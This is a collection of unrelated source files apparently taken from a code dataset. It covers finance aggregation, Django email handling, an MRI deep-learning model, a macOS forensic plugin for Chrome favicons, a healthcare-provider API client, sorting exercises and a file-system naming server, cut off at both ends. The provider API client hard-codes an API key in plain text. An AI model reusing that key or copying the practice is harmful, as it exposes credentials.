                    data[self.c.COLS.GHG_SCOPE12].where(use_S1S2, 0) + data[self.c.COLS.GHG_SCOPE3].where(use_S3, 0))
            except ZeroDivisionError:
                raise ValueError("To calculate the aggregation, the {} column may not be zero".format(value_column))
            owned_emissions = data[self.c.COLS.OWNED_EMISSIONS].sum()
            try:
                # Calculate the MOTS value per company
                with warnings.catch_warnings():
                    warnings.simplefilter("ignore")
                    result = data.apply(
                        lambda row: (row[self.c.COLS.OWNED_EMISSIONS] / owned_emissions) * row[input_column],
                        axis=1)
                return result
            except ZeroDivisionError:
                raise ValueError("The total owned emissions can not be zero")
        else:
            raise ValueError("The specified portfolio aggregation method is invalid")
| sijilo/ITR | ITR/portfolio_aggregation.py | portfolio_aggregation.py | py | 7,339 | python | en | code | null | github-code | 90 |
18389391279 | import sys
def solve():
    """Read N and N weights from stdin, then print the minimum possible
    absolute difference between the sum of a prefix and the sum of the
    remaining suffix (the split is made after each position 1..N).

    Fixes over the original: no longer shadows the builtin ``input``, and no
    longer seeds the minimum with the magic sentinel 1000000, which silently
    capped the answer whenever every achievable difference exceeded it.
    """
    data = sys.stdin.read().split()
    n = int(data[0])
    weights = [int(tok) for tok in data[1:1 + n]]
    total = sum(weights)
    # Running prefix sum; splitting after position i compares the prefix
    # against the remainder.  Assumes n >= 1 (as in the original problem).
    prefix = 0
    best = None
    for w in weights:
        prefix += w
        diff = abs(prefix - (total - prefix))
        if best is None or diff < best:
            best = diff
    print(best)
    return 0


if __name__ == "__main__":
    solve()
22824784325 | from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Count
from django.db.transaction import on_commit
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView, DetailView, ListView
from email import message_from_string
from email.utils import parseaddr
import re
import dateutil.parser
from .models import EmailMessage, ReceivedEmailMessage, EmailHeader
from .forms import EmailMessageForm
from .tasks import send_email_task
class EmailCreateView(LoginRequiredMixin, CreateView):
    """Create an EmailMessage from the submitted form, stamp the fixed
    notification sender on it, and queue delivery via the Celery task once
    the database transaction has committed."""
    model = EmailMessage
    form_class = EmailMessageForm
    success_url = reverse_lazy('emails:list')

    def form_valid(self, form):
        self.object = form.save()
        # All outgoing mail uses the same fixed sender identity.
        self.object.sender_name = 'Notifications'
        self.object.sender_email_address = \
            'alerts@notifications.chrismcdonald.ltd'
        self.object.html_content = ''
        self.object.save()
        # Dispatch only after commit so the worker can load the saved row.
        on_commit(lambda: send_email_task.delay(self.object.id))
        return HttpResponseRedirect(self.get_success_url())
class EmailDetailView(LoginRequiredMixin, DetailView):
    """Display a single sent EmailMessage, looked up by its id."""
    model = EmailMessage
    # These next two lines tell the view to index lookups by id
    slug_field = 'id'
    slug_url_kwarg = 'id'

    def get_context_data(self, **kwargs):
        # Call the base implementation first to get a context.
        # Fix: the original also assigned ``self.get_object()`` to an unused
        # local here, issuing a redundant database query (DetailView has
        # already fetched the object by this point); the dead call is removed.
        context = super().get_context_data(**kwargs)
        return context
class EmailListView(LoginRequiredMixin, ListView):
    """List sent emails, newest first, each annotated with its reply count."""
    model = EmailMessage
    # These next two lines tell the view to index lookups by id
    slug_field = 'id'
    slug_url_kwarg = 'id'

    def get_queryset(self):
        queryset = super(EmailListView, self).get_queryset()
        # Newest first; reply_count = number of related ReceivedEmailMessage rows.
        return queryset.order_by('-id').annotate(reply_count=Count('receivedemailmessage'))

    def get_context_data(self, **kwargs):
        # Call the base implementation first to get a context
        context = super().get_context_data(**kwargs)
        # Empty compose form for the inline "new email" form on the list page.
        context['form'] = EmailMessageForm()
        return context
@csrf_exempt
def parse(request):
    """Inbound-email webhook: parse a raw MIME message from the request body,
    persist it as a ReceivedEmailMessage with its headers, and link it back to
    the original outgoing EmailMessage via the In-Reply-To SES message id.

    Returns 201 on success, 403 when the In-Reply-To id cannot be matched.
    """
    # NOTE(review): these prints look like leftover debug output; consider
    # replacing them with logging.
    print(request.body)
    data = request.body.decode('utf8')
    print(data)
    email_message = message_from_string(data)
    # get all headers
    headers = email_message.items()
    # get a single header
    subject = email_message.get('Subject')
    from_address = email_message.get('From')
    sender_name, sender_email = parseaddr(from_address)
    date = dateutil.parser.parse(
        email_message.get('Date'))
    to_address = email_message.get('To')
    recipient_name, recipient_email = parseaddr(to_address)
    received_email = ReceivedEmailMessage(
        sender_name=sender_name,
        sender_email_address=sender_email,
        recipient_name=recipient_name,
        recipient_email_address=recipient_email,
        date=date,
        subject=subject)
    if email_message.is_multipart():
        messages = email_message.get_payload()
        for sub_message in messages:
            content = sub_message.get_payload(decode=True)
            decoded_content = content.decode(
                encoding=sub_message.get_content_charset())
            # content type could be 'text/plain',
            # 'text/html' or any MIME type (attachments)
            content_type = sub_message.get_content_type()
            if content_type == 'text/plain':
                received_email.plain_content = decoded_content
            elif content_type == 'text/html':
                received_email.html_content = decoded_content
    # Must be saved before headers can be attached to the M2M relation below.
    received_email.save()
    for name, value in headers:
        received_email.headers.add(
            EmailHeader.objects.create(name=name, value=value))
        if name == 'In-Reply-To':
            # SES message ids look like <uuid@eu-west-1.amazonses.com>.
            p = re.compile('<(.*)@eu-west-1.amazonses.com>')
            match = p.match(value)
            if match:
                message_id = match.group(1)
                try:
                    email_message = EmailMessage.objects.get(
                        message_id=message_id)
                    received_email.reply_to_email = email_message
                except EmailMessage.DoesNotExist:
                    # NOTE(review): the reply has already been saved at this
                    # point, so a 403 here leaves an orphaned record behind.
                    print('Unable to find matching message id')
                    return HttpResponse(status=403)
    received_email.save()
    return HttpResponse(status=201)
| chrismcband/email-reply-demo | email_reply_demo/emails/views.py | views.py | py | 4,448 | python | en | code | 0 | github-code | 90 |
4186524842 | """code for attention models"""
import torch
from box import Box
from torch import nn
from src.arch.slice_cnn_utils import Encoder1_2D, MaxPool, MeanPool, PooledAttention, ResNetEncoder
class MRI2DSlice(nn.Module):
    """Slice-set network over 3D MRI volumes.

    Each 2D slice along ``slice_dim`` is encoded with a shared 2D encoder; the
    per-slice embeddings are aggregated (attention / mean / max pooling) and
    fed to a small regressor producing one scalar per volume (brain age — the
    62.68 bias initialization below is a dataset mean).
    """

    def __init__(
        self, attn_num_heads, attn_dim, attn_drop=False, agg_fn="attention", in_channel=1,
        slice_dim=1, use_position_encoding=False, encoder_2d=None, resnet_module="resnet18",
        load_pretrained_encoder=False, initialization="custom", *args, **kwargs
    ):
        super(MRI2DSlice, self).__init__()
        # Volumes are assumed to be 91x109x91; input_dim collapses the sliced
        # axis to 1 and num_slices is the length of that axis.
        self.input_dim = [(1, 109, 91), (91, 1, 91), (91, 109, 1)][slice_dim - 1]
        self.num_slices = [91, 109, 91][slice_dim - 1]
        self.initialization = initialization
        self.num_heads = attn_num_heads
        self.attn_dim = attn_dim
        self.attn_drop = attn_drop
        self.agg_fn = agg_fn
        self.slice_dim = slice_dim
        self.use_position_encoding = use_position_encoding
        self.encoder_2d_name = encoder_2d
        self.load_pretrained_encoder = load_pretrained_encoder
        self.resnet_module = resnet_module
        self.in_channel = in_channel
        self.encoder_2d = self.create_2d_encoder()
        # Slice-embedding aggregation: multi-head attention pooling, or simple
        # mean/max pooling baselines.
        if agg_fn == "attention":
            self.pooled_attention = PooledAttention(
                input_dim=self.num_heads * self.attn_dim,
                dim_v=self.num_heads * self.attn_dim,
                dim_k=self.num_heads * self.attn_dim,
                num_heads=self.num_heads, ln=True
            )
        elif agg_fn == "mean":
            self.pooled_attention = MeanPool()
        elif agg_fn == "max":
            self.pooled_attention = MaxPool()
        else:
            raise Exception("Invalid attention function")
        # Build regressor
        self.attn_post = nn.Linear(self.num_heads * self.attn_dim, 64)
        self.regressor = nn.Sequential(nn.ReLU(), nn.Linear(64, 1))
        self.init_weights()
        # some precomputed things for creating inputs
        # Each tuple is a window of `in_channel` consecutive slice indices, so
        # neighbouring slices become input channels of the 2D encoder.
        self.collation_indices = list(
            zip(*[list(range(i, self.num_slices)) for i in range(in_channel)])
        )

    def create_2d_encoder(self):
        """Build the shared per-slice 2D encoder selected by encoder_2d_name.

        NOTE(review): returns None implicitly when the name is neither
        "encoder1" nor a resnet variant — confirm that is never hit.
        """
        if self.encoder_2d_name == "encoder1":
            return Encoder1_2D(
                self.num_heads * self.attn_dim, self.slice_dim, in_channel=self.in_channel,
                use_position_encoding=self.use_position_encoding, dropout=self.attn_drop,
                post_proc_conv=None, encoder_2d=None, post_position_encoding=None
            )
        if "resnet" in self.encoder_2d_name:
            return ResNetEncoder(
                self.num_heads * self.attn_dim, self.slice_dim, in_channel=self.in_channel,
                use_position_encoding=self.use_position_encoding, dropout=self.attn_drop,
                resnet_module=self.encoder_2d_name, pretrained=self.load_pretrained_encoder
            )

    def init_weights(self):
        """Initialize weights; the regressor bias starts at the mean age."""
        if "resnet" in self.encoder_2d_name or self.initialization == "default":
            # only keep this init
            for k, m in self.named_modules():
                if isinstance(m, nn.Linear) and "regressor" in k:
                    m.bias.data.fill_(62.68)
        else:
            # Custom init: He init for convs, small normal for linears.
            for k, m in self.named_modules():
                if isinstance(m, nn.Conv2d):
                    nn.init.kaiming_normal_(
                        m.weight, mode="fan_out",
                        nonlinearity="relu"
                    )
                    if m.bias is not None:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.Linear) and "regressor" in k:
                    m.bias.data.fill_(62.68)
                elif isinstance(m, nn.Linear):
                    nn.init.normal_(m.weight, 0, 0.01)
                    nn.init.constant_(m.bias, 0)

    def encode(self, x):
        """Encode a 5D batch (B, C, H, W, D) into one pooled embedding per
        volume; returns (embedding, attention weights)."""
        B, C, H, W, D = x.size()
        # remove channel dimension as it is 1.
        x = x.squeeze(1)
        if self.slice_dim == 1:
            # collation indices are list of tuple, so the "i" is a tuple and shape will be x,1,y,z
            # All slice windows are stacked along the batch dim so the 2D
            # encoder runs once, then split back and re-stacked on a slice dim.
            new_input = torch.cat([x[:, i, :, :] for i in self.collation_indices], dim=0)
            encoding = self.encoder_2d(new_input)
            encoding = torch.cat(
                [i.unsqueeze(2) for i in torch.split(encoding, B, dim=0)],
                dim=2
            )
            # note: squeezing without proper arguments is bad because batch dim can be dropped
            encoding = encoding.squeeze(4).squeeze(3)
        elif self.slice_dim == 2:
            new_input = torch.cat([x[:, :, i, :] for i in self.collation_indices], dim=0)
            # Move the slice-window axis into the channel position.
            new_input = torch.swapaxes(new_input, 1, 2)
            encoding = self.encoder_2d(new_input)
            encoding = torch.cat(
                [i.unsqueeze(3) for i in torch.split(encoding, B, dim=0)],
                dim=3
            )
            # note: squeezing without proper arguments is bad because batch dim can be dropped
            encoding = encoding.squeeze(4).squeeze(2)
        elif self.slice_dim == 3:
            new_input = torch.cat([x[:, :, :, i] for i in self.collation_indices], dim=0)
            new_input = torch.swapaxes(new_input, 1, 3)
            new_input = torch.swapaxes(new_input, 2, 3)
            encoding = self.encoder_2d(new_input)
            encoding = torch.cat(
                [i.unsqueeze(4) for i in torch.split(encoding, B, dim=0)],
                dim=4
            )
            # note: squeezing without proper arguments is bad because batch dim can be dropped
            encoding = encoding.squeeze(3).squeeze(2)
        else:
            raise Exception("Invalid slice dim")
        # swap dims for input to attention
        encoding = encoding.permute((0, 2, 1))
        encoding, attention = self.pooled_attention(encoding)
        return encoding.squeeze(1), attention

    def forward(self, x):
        """Full forward pass; returns a Box with 'y_pred' and 'attention'."""
        embedding, attention = self.encode(x)
        post = self.attn_post(embedding)
        y_pred = self.regressor(post)
        return Box({"y_pred": y_pred, "attention": attention})

    def get_attention(self, x):
        """Return only the attention weights for input x."""
        _, attention = self.encode(x)
        return attention
def get_arch(*args, **kwargs):
    """Factory hook: build the slice-set network and return it under 'net'."""
    model = MRI2DSlice(*args, **kwargs)
    return {"net": model}
| umgupta/2d-slice-set-networks | src/arch/ukbb/brain_age_slice_set.py | brain_age_slice_set.py | py | 6,276 | python | en | code | 5 | github-code | 90 |
18493066569 | #!/usr/bin/env python
# coding: utf-8
# In[16]:
S = input()
T = input()

# Map each character of S to the character of T at the same position; the
# correspondence must be consistent (a function) and injective (one-to-one).
mapping = {}
ans = "Yes"
for i, s_ch in enumerate(S):
    t_ch = T[i]
    if s_ch in mapping:
        if mapping[s_ch] != t_ch:
            ans = "No"
            break
    else:
        mapping[s_ch] = t_ch
else:
    # No conflict found; still reject if two S characters share a T character.
    if len(set(mapping.values())) != len(mapping):
        ans = "No"
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03252/s375616547.py | s375616547.py | py | 417 | python | en | code | 0 | github-code | 90 |
44485831703 | from riplib.Plugin import Plugin
import codecs
import logging
import os
import riplib.osxripper_time
import sqlite3
__author__ = 'osxripper'
__version__ = '0.1'
__license__ = 'GPLv3'
class UsersChromeFavicons(Plugin):
    """
    Parse information from /Users/<username>/Library/Application Support/Google/Chrome/Default/Favicons
    """

    def __init__(self):
        """
        Initialise the class.
        """
        super().__init__()
        self._name = "User Chrome Browser FavIcons"
        self._description = "Parse information from " \
                            "/Users/<username>/Library/Application Support/Google/Chrome/Default/Favicons"
        self._data_file = "Favicons"
        self._output_file = ""  # this will have to be defined per user account
        self._type = "sqlite"

    def parse(self):
        """
        Iterate over /Users directory and find user sub-directories
        """
        users_path = os.path.join(self._input_dir, "Users")
        # username = None
        if os.path.isdir(users_path):
            user_list = os.listdir(users_path)
            for username in user_list:
                # Skip the shared account; only real user homes are parsed.
                if os.path.isdir(os.path.join(users_path, username)) and not username == "Shared":
                    history_path = os.path\
                        .join(users_path, username, "Library", "Application Support", "Google", "Chrome", "Default")
                    if os.path.isdir(history_path):
                        self.__parse_sqlite_db(history_path, username)
                    else:
                        logging.warning("{0} does not exist.".format(history_path))
                        print("[WARNING] {0} does not exist.".format(history_path))
        else:
            logging.warning("{0} does not exist.".format(users_path))
            print("[WARNING] {0} does not exist.".format(users_path))

    def __parse_sqlite_db(self, file, username):
        """
        Read the Favicons SQLite database
        """
        # Output is appended to a per-user report file in the output directory.
        with codecs.open(os.path.join(self._output_dir, "Users_" + username + "_Chrome_Favicons.txt"),
                         "a", encoding="utf-8") as of:
            of.write("="*10 + " " + self._name + " " + "="*10 + "\r\n")
            history_db = os.path.join(file, self._data_file)
            # Join favicon bitmaps to the pages that reference them.
            query = "SELECT im.page_url,fi.url,fb.last_updated FROM " \
                    "favicon_bitmaps fb,favicons fi,icon_mapping im WHERE fb.icon_id = fi.id AND im.icon_id = fi.id"
            if os.path.isfile(history_db):
                of.write("Source File: {0}\r\n\r\n".format(history_db))
                conn = None
                try:
                    conn = sqlite3.connect(history_db)
                    conn.row_factory = sqlite3.Row
                    with conn:
                        cur = conn.cursor()
                        cur.execute(query)
                        rows = cur.fetchall()
                        for row in rows:
                            # Convert Chrome's Gregorian-microsecond timestamp.
                            last_updated = riplib.osxripper_time.get_gregorian_micros(row["last_updated"])
                            of.write("Page URL : {0}\r\n".format(row["page_url"]))
                            of.write("Icon URL : {0}\r\n".format(row["url"]))
                            of.write("Last Updated: {0}\r\n".format(last_updated))
                            of.write("\r\n")
                except sqlite3.Error as e:
                    logging.error("{0}".format(e.args[0]))
                    print("[ERROR] {0}".format(e.args[0]))
                finally:
                    if conn:
                        conn.close()
            else:
                logging.warning("File: {0} does not exist or cannot be found.\r\n".format(file))
                of.write("[WARNING] File: {0} does not exist or cannot be found.\r\n".format(file))
                print("[WARNING] File: {0} does not exist or cannot be found.".format(file))
            of.write("="*40 + "\r\n\r\n")
            of.close()
| maurice-schuppe/osxripper | plugins/osx/UsersChromeFavicons.py | UsersChromeFavicons.py | py | 3,970 | python | en | code | 1 | github-code | 90 |
74117362856 | import json
import requests
import asyncio
import BetterDocModels
async def GetProviders(location_coordinates, recordLimit, skipCount):
    """Query the BetterDoctor practices API around the given coordinates and
    return an apiResponse of mental-health providers accepting new patients.

    :param location_coordinates: object with latitude, longitude and
        searchAreaMiles attributes
    :param recordLimit: max number of records to fetch
    :param skipCount: pagination offset
    """
    # NOTE(review): 'counseling-pshychologist' looks misspelled — confirm the
    # exact BetterDoctor specialty uid before changing it.
    mentalHealthSpecialties = ["mental-health-counselor", 'psychiatrist', "mental-health-nurse-practitioner", 'clinical-psychologist', 'counseling-pshychologist', 'cognitive-behavioral-psychologist', 'psychologist']
    baseUrl = 'https://api.betterdoctor.com/2016-03-01/practices'
    # SECURITY: API key hard-coded in source — move to configuration/env var.
    user_key = '253c06706096f138941a110dbf3b0dfa'
    parameterizedUrl = "{}?location={},{},{}&user_key={}&sort=distance-asc&limit={}&skip={}".format(baseUrl, location_coordinates.latitude, location_coordinates.longitude,
                                                                                                   location_coordinates.searchAreaMiles, user_key, recordLimit, skipCount)
    # NOTE(review): requests.get is a blocking call inside a coroutine; it
    # will stall the event loop for the duration of the HTTP request.
    betterDocResponse = requests.get(parameterizedUrl)
    json_data = json.loads(betterDocResponse.text)
    fetchedCount = json_data['meta']['count']
    totalCount = json_data['meta']['total']
    willAcceptNewPatients = []
    matchedLocations = []
    for key in json_data['data']:
        # Collect some location specific information if the practice is accepting new patients
        if key['accepts_new_patients']:
            # NOTE(review): doctorName is assigned but never used.
            doctorName = ""
            # Some doctors don't have names so check before assiging
            # For now, ignore locations that don't provide a primary name
            if 'name' in key:
                practiceInfo = BetterDocModels.location(key['visit_address'], key['phones'], key['insurance_uids'], key['doctors'], key['name'])
                if 'distance' in key:
                    practiceInfo.distance = key['distance']
                willAcceptNewPatients.append(practiceInfo)
    for locations in willAcceptNewPatients:
        # Flag government insurance acceptance from the insurance uid list.
        for insurance in locations.acceptedInsurance:
            if insurance == "medicaid-medicaid":
                locations.isMedicaid = True
            if insurance == "medicare-medicare":
                locations.isMedicare = True
        for phone in locations.phones:
            if (phone["type"] == "landline"):
                locations.landlinePhone = phone["number"]
        for doctor in locations.doctors:
            info = BetterDocModels.doctorInfo()
            # Hack since I dont' know how to create new instance of object
            info.specialties = []
            info.npi = ""
            if 'specialties' in doctor:
                for specialty in doctor['specialties']:
                    doctorSpecialty = specialty["uid"]
                    if doctorSpecialty in mentalHealthSpecialties:
                        info.npi = doctor["npi"]
                        info.specialties.append(doctorSpecialty)
            # Only doctors with at least one mental-health specialty are kept.
            if (len(info.specialties) > 0):
                displayInfo = BetterDocModels.flattenedInfo()
                displayInfo.distance = locations.distance
                displayInfo.isMedicaid = locations.isMedicaid
                displayInfo.isMedicare = locations.isMedicare
                displayInfo.name = locations.name
                displayInfo.doctors = info
                # Format the 10-digit landline as (xxx) xxx-xxxx.
                displayInfo.landlinePhone = "({}) {}-{}".format(locations.landlinePhone[0:3], locations.landlinePhone[3:6], locations.landlinePhone[6:10])
                if 'street' in locations.locationAddress:
                    displayInfo.locationAddress = locations.locationAddress['street']
                if 'street2' in locations.locationAddress:
                    displayInfo.locationAddress += ", " + locations.locationAddress['street2']
                if 'city' in locations.locationAddress:
                    displayInfo.locationAddress += ", " + locations.locationAddress["city"]
                matchedLocations.append(displayInfo)
    response = BetterDocModels.apiResponse()
    response.providers = matchedLocations
    response.fetched = fetchedCount
    response.total = totalCount
    return response
def bubble_sort(c, n):
    """Stable in-place bubble sort of the first n cards by rank (char at
    index 1).  Returns the same list object for convenience."""
    for unsorted_end in range(n - 1, 0, -1):
        for j in range(unsorted_end):
            # Adjacent swap only on strict inequality keeps the sort stable.
            if c[j][1] > c[j + 1][1]:
                c[j], c[j + 1] = c[j + 1], c[j]
    return c
def selection_sort(c, n):
    """In-place selection sort of the first n cards by rank (char at index 1).

    Selection sort is not stable: cards of equal rank may be reordered.
    Returns the same list object for convenience.
    """
    for i in range(n - 1):
        # Locate the smallest remaining rank.
        minj = i
        for j in range(i + 1, n):
            if c[j][1] < c[minj][1]:
                minj = j
        # Bug fix: the original guarded the swap with `if i != j:`, comparing
        # against the stale inner-loop variable (always n-1 here, so the test
        # was always true).  Guard against the no-op self-swap correctly.
        if minj != i:
            c[i], c[minj] = c[minj], c[i]
    return c
def main():
    """Read a card count and card list from stdin, then print the
    bubble-sorted deck with its stability verdict followed by the
    selection-sorted deck with its verdict."""
    n = int(input())
    deck = input().split()
    stable_result = bubble_sort(deck.copy(), n)
    print(*stable_result)
    print("Stable")  # bubble sort never reorders cards of equal rank
    selection_result = selection_sort(deck, n)
    print(*selection_result)
    # Selection sort is stable only if it happens to match the stable order.
    print("Stable" if stable_result == selection_result else "Not stable")


if __name__ == "__main__":
    main()
| Aasthaengg/IBMdataset | Python_codes/p02261/s332392205.py | s332392205.py | py | 812 | python | en | code | 0 | github-code | 90 |
16465742603 | from moco_wrapper.models import objector_models as obj
class PlanningEntry(object):
    """Wraps a raw planning-entry payload, promoting the nested ``project``
    and ``user`` dictionaries to their objector model classes before copying
    every field onto the instance."""

    def __init__(self, **kwargs):
        attributes = kwargs
        project_data = attributes.get("project")
        if project_data is not None:
            attributes["project"] = obj.Project(**project_data)
        user_data = attributes.get("user")
        if user_data is not None:
            attributes["user"] = obj.User(**user_data)
        # Expose every (possibly converted) field as an instance attribute.
        self.__dict__.update(attributes)
| sommalia/moco-wrapper | moco_wrapper/models/objector_models/planning_entry.py | planning_entry.py | py | 465 | python | en | code | 2 | github-code | 90 |
6185444852 | # abs01.py
# 어떠한 숫자에 대해 절대 값으로 만들어 주는 함수 만들기
# 매개 변수 이름은 임의의 이름이어도 된다.
def absolute(n):
    """Return the absolute value of n (a hand-rolled version of built-in abs)."""
    return -n if n < 0 else n
su = -5
result = absolute(su)
print(result)

mylist = [2, -4, -7]
newlist = []
for i in mylist:
    newlist.append(absolute(i))
print(newlist)  # build the new list with a for loop

newlist2 = [absolute(i) for i in mylist]  # build the list with a list comprehension
print(newlist2)

print('finished')
40390680540 | import socket
from threading import Thread
import random
from time import sleep
BUFFER = 1024  # bytes read per socket recv() call

# Port layout of the naming/storage protocol (one port per channel).
SERVER_WELCOME_PORT = 5000
SERVER_HEARTBEAT_PORT = 5001
CLIENT_MESSAGE_PORT = 5002
SERVER_MESSAGE_PORT = 5003

# Field separator used inside protocol messages (text and bytes forms).
DELIMITER = "?CON?"
B_DELIMITER = b"?CON?"

# TODO CHANGE
REPLICAS = 2  # number of replicas kept per file

# Protocol status replies (text and bytes forms).
ERR_MSG = "NO"
B_ERR_MSG = b"NO"
CONFIRM_MSG = "YES"
B_CONFIRM_MSG = b"YES"

# Dict {ServerIP:ServerName}
StorageServers = {}
# Dict {ServerIP:ServerMessageSocket}
StorageServerMessageSockets = {}
ClientIPs = []  # IPs of clients that have connected
class FilesTree:
    """Virtual directory tree of all stored files, rooted at 'root'."""

    def __init__(self):
        self.root = FolderNode("root", None)

    def getFolderByPath(self, path: str):
        """Walk a '/'-separated path from the root and return the folder node.

        Empty path components (leading/trailing/double slashes) are ignored;
        a missing component propagates the exception from FolderNode.getFolder.
        """
        node = self.root
        for component in path.split("/"):
            if component:
                node = node.getFolder(component)
        return node
# Folder
class FolderNode:
    """A directory node in the virtual file tree.

    Holds child folders, file records, and a reference to the parent folder
    (``head``; ``None`` for the root).
    """

    def __init__(self, name: str, head):
        self.name = name
        self.files = []    # file records stored directly in this folder
        self.folders = []  # child FolderNode instances
        self.head = head   # parent folder, or None for the root

    def addFolder(self, node):
        """Attach ``node`` as a child folder and set its parent pointer."""
        self.folders.append(node)
        node.head = self

    def removeFolder(self, node):
        """Detach a child folder (raises ValueError if it is not a child)."""
        self.folders.remove(node)

    def getFolder(self, folderName):
        """Return the child folder with the given name.

        Raises:
            Exception: if no child folder has that name (kept as a bare
                Exception because callers catch it broadly).
        """
        for folder in self.folders:
            if folder.name == folderName:
                return folder
        raise Exception

    def addFile(self, leafFile):
        """Register a file record in this folder."""
        self.files.append(leafFile)

    def removeFile(self, leafFile):
        """Remove a single file record (raises ValueError if absent)."""
        self.files.remove(leafFile)

    def removeAllFiles(self):
        """Drop every file record in this folder.

        Bug fix: the original removed elements from ``self.files`` while
        iterating over the same list, which skips every other element and
        leaves roughly half of the files behind.  ``list.clear`` removes all.
        """
        self.files.clear()

    def isEmpty(self):
        """True when the folder has neither child folders nor files."""
        return len(self.folders) == 0 and len(self.files) == 0

    def __str__(self):
        """
        String with all info about folders and files.
        """
        if len(self.folders) != 0:
            result = "│Folders:"
            for folder in self.folders:
                result += f"\n└──{folder.name}"
            result += "\n\n"
        else:
            result = "Directory does not contain any folder\n"
        if len(self.files) != 0:
            result += "│Files:"
            for fileInfo in self.files:
                result += f"\n└──{fileInfo.fileName}"
        else:
            result += "Directory does not contain any file"
        return result
class FileInfo:
    """Metadata record for one stored file and the servers holding replicas."""

    def __init__(self, fileName: str, filePath: str, fileSize: int):
        self.fileName = fileName
        self.filePath = filePath
        self.fileSize = fileSize
        self.storageServers = set()  # IPs of servers holding a replica

    def fileLocation(self):
        """
        Return tuple of fileName and filePath
        """
        return self.fileName, self.filePath

    def addContainer(self, serverIP: str):
        """Record a single storage server as holding a replica."""
        self.storageServers.add(serverIP)

    def addContainers(self, serverIPs):
        """Record several storage servers at once."""
        self.storageServers.update(serverIPs)

    def deleteContainer(self, serverIP: str):
        """Forget the replica held by the given storage server."""
        self.storageServers.remove(serverIP)

    def __str__(self):
        """
        To string method
        """
        return (f"FileName: {self.fileName}, FileSize: {self.fileSize}, "
                f"FilePath: {self.filePath}\n"
                f"Storage servers IPs: {self.storageServers}")

    def encode(self):
        """
        Return encoded data about file separated by delimiters
        """
        fields = (self.fileName, str(self.fileSize), self.filePath)
        return DELIMITER.join(fields).encode()
class StorageDemon:
    """Central bookkeeping of which files are stored on which storage servers.

    Maintains three synchronized views of the stored data:
      * ``serversFiles`` -- Dict {ServerIP: [FileInfo, ...]}
      * ``fileDict``     -- Dict {(fileName, filePath): FileInfo}
      * ``fileTree``     -- virtual directory tree of FolderNode objects
    """

    def __init__(self):
        self.serversFiles = dict()  # Dict {ServerIP:[FileInfo-s]}.
        self.fileDict = dict()  # Dict {(fileLocation):FileInfo}
        self.fileTree = FilesTree()

    def addFileToServer(self, server, fileInfo: FileInfo):
        """
        Add file to serverFiles dictionary.
        Do not send the file.
        """
        self.serversFiles.setdefault(server, []).append(fileInfo)

    def delFileFromServer(self, server, fileInfo: FileInfo):
        """
        Remove file from serverFiles dictionary.
        Do not delete file from the server itself.
        """
        self.serversFiles[server].remove(fileInfo)

    def isFileExists(self, fileInfo: FileInfo):
        """
        Check whether the file exists as a record in the demon.
        """
        # Plain membership test replaces the original try/bare-except lookup.
        return fileInfo.fileLocation() in self.fileDict

    def initialize(self, clientSocket: socket.socket):
        """
        Send the request to delete all files from storage servers.
        Purge all data about files.
        Receive information about the storage from servers and send that refactored to the client.
        """
        # Purge bookkeeping once, up front (the original re-created these
        # dicts on every loop iteration, which was redundant).
        self.serversFiles = dict()
        self.fileDict = dict()
        self.fileTree = FilesTree()
        space = 0
        for serverSocket in StorageServerMessageSockets.values():
            serverSocket.send(b"init")
            data = serverSocket.recv(BUFFER).decode().split(DELIMITER)
            space += int(data[1])
        # Usable space: raw total divided by the replication factor, then
        # scaled by 2**20 and 8 (presumably bits -> MiB; TODO confirm units).
        realSpace = space // REPLICAS // (2**20) // 8
        clientSocket.send(str(realSpace).encode())

    def createFile(self, fileInfo: FileInfo):
        """
        Send request to create files to the StorageServers.
        Add info about the file to the demon.
        If file already exists (same fileName and path), replace it with an empty copy.
        """
        # Send the create request only to servers that already hold this file
        if self.isFileExists(fileInfo):
            trueFileInfo: FileInfo = self.fileDict[fileInfo.fileLocation()]
            # Make it "empty"
            trueFileInfo.fileSize = 0
            for server in trueFileInfo.storageServers:
                print(f"Send CREATE request to storage server with IP:{server}")
                StorageServerMessageSockets[server].send(b"create" + B_DELIMITER + fileInfo.encode())
            return
        # Choose random servers to handle the request.
        # NOTE: random.sample() requires a sequence -- sampling dict views
        # was removed in Python 3.11, hence the explicit list().
        servers = random.sample(list(StorageServers.keys()), REPLICAS)
        # add the chosen servers as replica holders of this file
        fileInfo.addContainers(servers)
        # add file in fileTree
        self.fileTree.getFolderByPath(fileInfo.filePath).addFile(fileInfo)
        # add file to fileDict
        self.fileDict[fileInfo.fileLocation()] = fileInfo
        for server in servers:
            # add file to servers dict-s
            self.addFileToServer(server, fileInfo)
            print(f"Send CREATE request to storage server with IP:{server}")
            # send request
            StorageServerMessageSockets[server].send(b"create" + B_DELIMITER + fileInfo.encode())

    def readFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
        """
        Send file from storage server to client via informing each other about necessary info.
        If file does not exist, send error message to client.
        """
        if self.isFileExists(fileInfo):
            trueFileInfo = self.fileDict[fileInfo.fileLocation()]
            # random.choice over a tuple: random.sample(set, 1) stopped
            # working in Python 3.11.
            server = random.choice(tuple(trueFileInfo.storageServers))
            clientSocket.send(DELIMITER.join([server, str(trueFileInfo.fileSize)]).encode())
            print(f"Send READ to storage server with IP:{server}")
            StorageServerMessageSockets[server].send(b"read" + B_DELIMITER + trueFileInfo.encode())
        else:
            print(f"No such file {fileInfo}")
            clientSocket.send(B_ERR_MSG)

    def writeFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
        """
        Send file from client to storage server via informing each other about necessary info.
        Add record about file to demon.
        If file already exists (same fileName and path), replace it with the sent file.
        """
        # Send the write request only to servers that already hold this file
        if self.isFileExists(fileInfo):
            trueFileInfo: FileInfo = self.fileDict[fileInfo.fileLocation()]
            trueFileInfo.fileSize = fileInfo.fileSize
            servers = trueFileInfo.storageServers
            for server in servers:
                # BUGFIX: the original log line wrongly said "CREATE" here.
                print(f"Send WRITE request to storage server with IP:{server}")
                StorageServerMessageSockets[server].send(b"write" + B_DELIMITER + fileInfo.encode())
            clientSocket.send(DELIMITER.join(servers).encode())
            return
        # choose random servers to handle request (list() for Python 3.11+)
        servers = random.sample(list(StorageServers.keys()), REPLICAS)
        # add the chosen servers as replica holders of this file
        fileInfo.addContainers(servers)
        # add file in fileTree
